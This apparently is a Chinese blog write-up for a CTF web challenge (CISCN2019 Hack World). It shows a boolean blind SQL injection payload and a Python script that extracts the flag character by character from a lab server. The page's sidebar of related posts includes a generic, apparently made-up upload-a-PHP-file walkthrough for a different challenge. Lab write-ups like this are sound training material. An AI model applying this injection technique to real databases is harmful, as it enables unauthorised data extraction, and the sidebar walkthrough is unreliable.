[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2023-10-05 23:25:20 发布
最新推荐文章于 2023-10-05 23:25:20 发布
阅读量148 收藏
点赞数
分类专栏: wp 文章标签: SQL注入 布尔盲注 Python脚本 数据库提取 安全测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55234680/article/details/121017296
版权

打开题目,简单测试发现是数字型注入且大部分关键字都被过滤,尝试布尔盲注。

id=0^((substr((select(flag)from(flag)),1,1))='f')

回显id=1时的界面
说明注入成功,用脚本即可跑出flag

import requests

url = "http://88cefe6c-611d-488c-89c1-a6ae8a08a682.node4.buuoj.cn:81/index.php"
dat = { "id" : ""}
a=[">"]

for i in range(1,60):
    print(f"{i}> ",end="")
    for u in "}-{qazxswedcvfrtgbnhyujmkiolp1234567890":
        dat['id'] = "0^((substr((select(flag)from(flag)),"+str(i)+",1))='"+u+"')"
        res = requests.post(url, data=dat, timeout=100)
        if "Hello" in res.text:
            print(u)
            a.append(u)
            if u == "}":
                for w in a:
                    print(w,end="")

在这里插入图片描述

要注意的是,"-"被过滤了,需要在未得到值的地方将其加上

d0ud
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 642
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
国赛 2019 华北赛区 Web 题目
最新发布
05-19
ciscn
利用PHAR协议进行PHP反序列化攻击1
08-03
在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化漏洞来实现文件读取或执行其他操作。例如,通过上传一个伪装成图片的PHAR文件,然后更改其后缀,使得PHP尝试解析它。...
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
2019华北电力大学全日制专业学位招生目录1
08-03
① 101 思想政治理论 ② 204 英语二 ③ 302 数学二 ④ 811 电力系统分析基础 ① 电力系统综合 ② 电力电子技术 ③ 高电压技术 ① 发电厂电
华北电力大学高等数学期末考试题2018-2019第2学期(A).pdf
06-06
华北电力大学高等数学期末考试题2018-2019第2学期(A),适合考研复试以及平常期末考试复习使用
华北科技学院计算机系计算机网络2019年期末考试复习大纲.zip
06-18
华北科技学院计算机网络课程发复习大纲,由老师给予,其中知识点由老师总结的大概,然后由自己添加完成,附含一百多道老师所给的选择题大题等
6890F1(华北工控mitx6890的亮机bios)
03-15
标题中的“6890F1(华北工控mitx6890的亮机bios)”指的是华北工控公司生产的MITX-6890主板的BIOS固件更新文件,其中“6890F1”可能是该版本BIOS的具体型号或代号。BIOS(Basic Input/Output System)是计算机硬件系统...
华北电力大学2019年毕业生就业质量年度报告.pdf
04-12
华北电力大学2019年毕业生就业质量年度报告.pdf
[CISCN 2019华北Day2]Web1 - 布尔盲注
oZuoShen123的博客
10-05 466
考点:布尔盲注【注意,sql中的substr初始位置是1不是0】 1、页面提示用id传参,而且我们发现是post传参 2、我们传了id=1后提示“Hello, glzjin wants a girlfriend.“ 3、由于这题直接输入查询字符,可以通过字典爆破过滤,过滤了and、order、where、空格等字符 4、传id=1',发现是显示bool值, 这题说明是盲注题型 post: id=0 —— Error Occured When Fetch Result. id=1 —— Hello, gl
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的用户名和密码,但是都无法登录成功。因此,我们需要通过其他方式来获取flag。 我们可以尝试一些常见的Web漏洞,比如SQL注入、XSS等。在这个题目中,我们可以尝试一些文件上传漏洞。 我们可以通过Burp Suite等工具,来拦截网站的上传请求,然后修改上传的文件,来获取flag。 具体的操作步骤如下: 1. 使用Burp Suite等工具,拦截上传请求。 2. 修改上传的文件,将文件名改为flag.php。 3. 将上传的文件类型改为php。 4. 将上传的文件内容改为以下内容: <?php echo "flag{xxxxxxxxxxxxxxxxxxxx}"; ?> 其中,xxxxxxxxxxxxxxxxxxxx为flag的具体内容。 5. 发送修改后的上传请求,上传文件。 6. 访问上传的文件,即可获取flag。 通过以上步骤,我们就可以成功获取到flag了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值